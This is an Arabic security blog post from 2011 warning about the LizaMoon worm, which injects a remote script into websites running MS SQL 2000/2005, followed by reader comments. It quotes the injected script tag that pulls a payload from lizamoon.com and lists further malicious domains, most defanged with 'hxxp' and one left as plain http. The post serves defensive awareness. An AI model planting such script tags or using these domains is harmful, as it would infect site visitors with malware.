تحذير من دودة Lizamoon

اصدرت شركة Websense تحذيراً من دودة Lizamoon والتي بدأت بالانتشار بشكل متسارع حيث تقوم باستغلال ثغرة لحقن كود في المواقع يشير الى موقع lizamoon.com والذي سمّيت الدودة باسمه.

الكود الذي يحقن في المواقع هو

<script src=hxxp://lizamoon.com/ur.php></script>

يمكن الاطلاع على عدد المواقع المحقونة باستخدام غوغل

مثال على موقع مصاب

تحديث (٣-٤-٢٠١١): ارتفع عدد المواقع المصابة إلى أكثر من مليون موقع مما يجعل هذه الدودة من اكثر المتسببين في اصابات مواقع إن لم تكن أكثرهم. المواقع المصابة تستخدم MS SQL 2000 أو MS SQL 2005.

صحيح أن الدودة بدأت بحقن المواقع بكود يؤشر الى موقع lizamoon إلا أنّ  هذا النّطاق هو أحد النّطاقات التي تستخدمه الدودة وليس الوحيد. هنا قائمة أوّليّة بالمواقع الأخرى:

hxxp://milapop.com/ur.php
hxxp://pop-stats.info/ur.php
hxxp://eva-marine.info/ur.php
hxxp://google-stats50.info/ur.php
hxxp://google-stats44.info/ur.php
hxxp://google-stats45.info/ur.php
hxxp://google-stats47.info/ur.php
hxxp://google-stats48.info/ur.php
hxxp://google-stats49.info/ur.php
hxxp://system-stats.info/ur.php
hxxp://stats-master88.info/ur.php
hxxp://stats-master11.info/ur.php
hxxp://stats-master111.info/ur.php
hxxp://agasi-story.info/ur.php
hxxp://social-stats.info/ur.php
hxxp://extra-service.info/ur.php
http://sol-stats.info/ur.php

نبذة عن الكاتب

بشار ماجستير نظم معلومات. مهندس أنظمة يمتلك خبرة في إدارة أنظمة ويندوز ولينكس. باحث ومختصص في مجال أنظمة المعلومات، معالجة الحوادث الأمنيّة، تحليل الإختراقات الأمنيّة، وفحصوصات الاختراق. حاصل على العديد من الشهادات الأمنيّة. عضو في مجلس استشاريّي معهد سانز لأمن المعلومات.

التعليقات:

أضف تعليقاً | عدد التعليقات: (4)

  1. Hit-Man قال:

    السلام عليكم
    شكرا لك أخي بشار
    هل هكدا يكتب الكود أخي

    أقصد hXXp !
    و شكرا على مجهوداتكم أخي

  2. بركات قال:

    يبدوا أنها تستغل ثغرة sql injection في احد تطبيقات asp , aspx وتحقن هذا الرابط عن طريقها. الغريب ان الرابط ﻻحياة فيه :


    $ ping -c 1 www.lizamoon.com
    ping: unknown host www.lizamoon.com

    وهذا منذ أن قرأت الخبر

  3. بشار قال:

    أخي بركات كلامك سليم بخصوص موقع lizamoon فهذا الموقع تمّ إغلاقه. ولكن هناك مواقع أخرى يتمّ حقنها. تمّ تحديث المقال بمعلومات إضافية حولها.

أكتب تعليق